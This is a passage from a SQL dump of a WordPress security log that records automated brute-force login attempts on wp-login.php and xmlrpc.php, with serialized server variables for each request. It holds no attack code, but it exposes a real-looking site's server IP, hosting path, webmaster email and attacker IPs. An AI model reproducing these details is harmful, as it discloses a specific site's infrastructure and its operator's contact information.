03:55:11',18259472,19559408,'https://bintara.com.my/xmlrpc.php',1,0,'103.7.41.216'),(24886,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"34322\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGrfUQGijxhVPhG1M0P5QAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779133.7844\";s:12:\"REQUEST_TIME\";s:10:\"1568779133\";}}','notice','2019-09-18 03:58:55','2019-09-18 03:58:54',17741832,19234240,'https://bintara.com.my/wp-login.php',1,0,'188.165.206.114'),(24887,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.206.114\";s:11:\"REMOTE_PORT\";s:5:\"35106\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGrgCqbKGlf1IVly7OZGwAAAVc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779136.6215\";s:12:\"REQUEST_TIME\";s:10:\"1568779136\";}}','notice','2019-09-18 03:58:57','2019-09-18 03:58:56',18259736,19559048,'https://bintara.com.my/xmlrpc.php',1,0,'188.165.206.114'),(24888,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"50812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGrp61FqYKvioG46Y4dHAAAAIw\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779175.7032\";s:12:\"REQUEST_TIME\";s:10:\"1568779175\";}}','notice','2019-09-18 03:59:36','2019-09-18 03:59:36',17741712,19233680,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24889,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"51244\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGrqq1FqYKvioG46Y4dIAAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779178.3949\";s:12:\"REQUEST_TIME\";s:10:\"1568779178\";}}','notice','2019-09-18 03:59:39','2019-09-18 03:59:38',18259464,19556168,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(24890,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.224.77\";s:11:\"REMOTE_PORT\";s:5:\"44642\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGtLa1FqYKvioG46Y4eAgAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779565.7233\";s:12:\"REQUEST_TIME\";s:10:\"1568779565\";}}','notice','2019-09-18 04:06:07','2019-09-18 04:06:06',17742240,19234088,'https://bintara.com.my/wp-login.php',1,0,'108.179.224.77'),(24891,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"108.179.224.77\";s:11:\"REMOTE_PORT\";s:5:\"45448\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGtMCR0vdvYEIduPCLZUgAAAQQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779568.8148\";s:12:\"REQUEST_TIME\";s:10:\"1568779568\";}}','notice','2019-09-18 04:06:10','2019-09-18 04:06:09',18259888,19559368,'https://bintara.com.my/xmlrpc.php',1,0,'108.179.224.77'),(24892,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.21.81\";s:11:\"REMOTE_PORT\";s:5:\"57744\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGuzW4SfF9g@8lNlxwvUgAAAEE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779981.6146\";s:12:\"REQUEST_TIME\";s:10:\"1568779981\";}}','notice','2019-09-18 04:13:03','2019-09-18 04:13:01',17742280,19233048,'https://bintara.com.my/wp-login.php',1,0,'162.214.21.81'),(24893,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"162.214.21.81\";s:11:\"REMOTE_PORT\";s:5:\"58398\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGu0CqbKGlf1IVly7OaagAAAUQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568779985.1549\";s:12:\"REQUEST_TIME\";s:10:\"1568779985\";}}','notice','2019-09-18 04:13:06','2019-09-18 04:13:05',18260144,19558520,'https://bintara.com.my/xmlrpc.php',1,0,'162.214.21.81'),(24894,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"159.253.32.120\";s:11:\"REMOTE_PORT\";s:5:\"60002\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYGvO24SfF9g@8lNlxwvgAAAAFY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568780091.9268\";s:12:\"REQUEST_TIME\";s:10:\"1568780091\";}}','notice','2019-09-18 04:14:53','2019-09-18 